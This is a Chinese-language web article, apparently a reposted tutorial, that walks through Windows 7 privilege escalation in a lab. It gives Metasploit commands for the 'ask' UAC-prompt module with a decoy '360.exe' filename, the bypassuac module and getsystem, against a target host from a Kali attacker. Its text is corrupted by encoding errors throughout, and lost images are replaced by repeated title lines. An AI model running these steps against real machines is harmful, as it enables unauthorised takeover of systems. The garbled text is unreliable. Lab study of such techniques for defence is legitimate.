大數(shù)據(jù)內(nèi)網(wǎng)滲透中怎樣通過提高程序運行級別提升權(quán)限

發(fā)布時間：2021-12-10 09:17:51 來源：億速云閱讀：165 作者：柒染欄目：大數(shù)據(jù)

這期內(nèi)容當(dāng)中小編將會給大家?guī)碛嘘P(guān)大數(shù)據(jù)內(nèi)網(wǎng)滲透中怎樣通過提高程序運行級別提升權(quán)限，文章內(nèi)容豐富且以專業(yè)的角度為大家分析和敘述，閱讀完這篇文章希望大家可以有所收獲。

環(huán)境：攻：Kali 2020，ip：192.168.1.133

受：win7 x86，ip：192.168.1.137

一、生成木馬及監(jiān)聽主機：

提升權(quán)限

二、提升權(quán)限

1、將當(dāng)前session放到后臺，background

大數(shù)據(jù)內(nèi)網(wǎng)滲透中怎樣通過提高程序運行級別提升權(quán)限

2、選擇提權(quán)模塊，use exploit/windows/local/ask

3、查看需要配置的參數(shù)，show options

大數(shù)據(jù)內(nèi)網(wǎng)滲透中怎樣通過提高程序運行級別提升權(quán)限

3、查看并設(shè)置當(dāng)前sessions值，set session 2

4、設(shè)置彈出程序的名字，set filename 360.exe

大數(shù)據(jù)內(nèi)網(wǎng)滲透中怎樣通過提高程序運行級別提升權(quán)限

5、run，小受會彈出一個對話框，點擊是，即可獲取系統(tǒng)權(quán)限

大數(shù)據(jù)內(nèi)網(wǎng)滲透中怎樣通過提高程序運行級別提升權(quán)限

三、UAC繞過(需要在管理組)

1、上面的方法由于需要交互，如果向省去交互的步驟，可以利用下面的bypassuac模塊繞過彈窗

2、選擇模塊：use exploit/windows/local/bypassuac

3、查看并設(shè)置當(dāng)前sessions值，set session 1

4、run，不用進行交互

大數(shù)據(jù)內(nèi)網(wǎng)滲透中怎樣通過提高程序運行級別提升權(quán)限

5、查看權(quán)限用命令getuid，提示還是普通權(quán)限，然后通過命令getsystem獲取系統(tǒng)權(quán)限，再用getuid查看權(quán)限，發(fā)現(xiàn)以獲取系統(tǒng)權(quán)限，如果不操作上面的步驟，用命令getsystem，會提示獲取失敗

大數(shù)據(jù)內(nèi)網(wǎng)滲透中怎樣通過提高程序運行級別提升權(quán)限

上述就是小編為大家分享的大數(shù)據(jù)內(nèi)網(wǎng)滲透中怎樣通過提高程序運行級別提升權(quán)限了，如果剛好有類似的疑惑，不妨參照上述分析進行理解。如果想知道更多相關(guān)知識，歡迎關(guān)注億速云行業(yè)資訊頻道。

向AI問一下細節(jié)

大數(shù)據(jù)內(nèi)網(wǎng)滲透中怎樣通過提高程序運行級別提升權(quán)限

猜你喜歡

最新資訊

相關(guān)推薦

相關(guān)標(biāo)簽